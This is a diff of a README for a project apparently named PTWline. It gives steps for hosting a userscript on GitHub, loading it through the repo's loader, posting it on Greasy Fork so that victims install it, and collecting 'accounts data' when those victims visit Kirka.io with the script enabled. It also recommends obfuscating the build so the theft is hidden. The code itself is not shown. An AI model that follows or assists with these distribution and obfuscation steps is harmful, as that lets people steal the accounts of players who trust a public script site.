petiuka/PTWline/README.md

 4.(Method to post script on greasefork) Upload script to github, make raw txt file and copy link to use loadmethod from this repo and after this post that on greasefork

-5.Now to get accounts data you need someone with the included script to log into your account (in Kirka.io only goto website with script)
+5.Now to get accounts data you need someone with the enabled script to log into your account (in Kirka.io only goto website with script)

 ### Recommended to obfuscate your PTWline build
 Websites to obfuscate: